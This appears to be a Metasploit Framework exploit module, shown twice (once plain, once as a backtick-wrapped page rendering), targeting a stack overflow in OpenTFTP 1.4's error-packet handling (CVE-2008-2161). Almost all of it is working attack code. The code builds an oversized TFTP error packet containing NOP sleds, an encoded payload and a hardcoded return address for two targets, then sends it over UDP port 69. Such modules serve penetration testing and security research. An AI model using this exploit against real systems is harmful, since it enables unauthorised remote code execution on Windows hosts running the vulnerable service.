metasploit-framework/modules/exploits/windows/tftp/opentftp_error_code.rb

##
# $ $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'OpenTFTP Error Packet Overflow',
			'Description'    => %q{
					
			},
			'Author'         => [ 'steponequit' ],
			'Version'        => '$$',
			'References'     =>
				[
					['CVE', 'CVE-2008-2161'],
					['OSVDB', ''],
					['BID', ''],
					['URL','http://downloads.securityfocus.com/vulnerabilities/exploits/29111.pl'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 5000,
					'BadChars' => "\x00\x0a\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'OpenTFTP 1.4 Service',  { 'Ret' => 0x0041b3ab } ], 
                                        [ 'OpenTFTP 1.4 Stand Alone',  { 'Ret' => 0x0041b3ab } ], #.bss section that is overwritten

				],
			'Privileged'     => false,
			'DisclosureDate' => 'Nov 27 2006'))

		register_options(
			[
				Opt::RPORT(69),
			], self.class)
	end

	def exploit
		connect_udp
		if target.name =~ /OpenTFTP 1.4 Stand Alone/
			print_status("1")
			sploit = "\x00\x05" + make_nops(10)
			sploit << payload.encoded
			sploit << make_nops(20517 - payload.encoded.length)
			sploit << [target['Ret']].pack('V')
			sploit << Rex::Text.rand_text_alpha(1469)
		end
                if target.name =~ /OpenTFTP 1.4 Service/ 
			print_status("2")
                        sploit = "\x00\x05" + make_nops(10)
                        sploit << payload.encoded
                        sploit << make_nops(20445 - payload.encoded.length)
                        sploit << [target['Ret']].pack('V')
                        sploit << Rex::Text.rand_text_alpha(1545)
                end


		udp_sock.put(sploit)
		disconnect_udp
	end

end
added initial opentftp 1.4 windows exploit 2011-12-22 05:24:16 +00:00			`##`
			`# $ $`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/framework/`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = AverageRanking`

			`include Msf::Exploit::Remote::Udp`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'OpenTFTP Error Packet Overflow',`
			`'Description' => %q{`

			`},`
			`'Author' => [ 'steponequit' ],`
			`'Version' => '$$',`
			`'References' =>`
			`[`
			`['CVE', 'CVE-2008-2161'],`
			`['OSVDB', ''],`
			`['BID', ''],`
			`['URL','http://downloads.securityfocus.com/vulnerabilities/exploits/29111.pl'],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 5000,`
			`'BadChars' => "\x00\x0a\x0d",`
			`'StackAdjustment' => -3500,`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'OpenTFTP 1.4 Service', { 'Ret' => 0x0041b3ab } ],`
			`[ 'OpenTFTP 1.4 Stand Alone', { 'Ret' => 0x0041b3ab } ], #.bss section that is overwritten`

			`],`
			`'Privileged' => false,`
			`'DisclosureDate' => 'Nov 27 2006'))`

			`register_options(`
			`[`
			`Opt::RPORT(69),`
			`], self.class)`
			`end`

			`def exploit`
			`connect_udp`
			`if target.name =~ /OpenTFTP 1.4 Stand Alone/`
			`print_status("1")`
			`sploit = "\x00\x05" + make_nops(10)`
			`sploit << payload.encoded`
			`sploit << make_nops(20517 - payload.encoded.length)`
			`sploit << [target['Ret']].pack('V')`
			`sploit << Rex::Text.rand_text_alpha(1469)`
			`end`
			`if target.name =~ /OpenTFTP 1.4 Service/`
			`print_status("2")`
			`sploit = "\x00\x05" + make_nops(10)`
			`sploit << payload.encoded`
			`sploit << make_nops(20445 - payload.encoded.length)`
			`sploit << [target['Ret']].pack('V')`
			`sploit << Rex::Text.rand_text_alpha(1545)`
			`end`


			`udp_sock.put(sploit)`
			`disconnect_udp`
			`end`

			`end`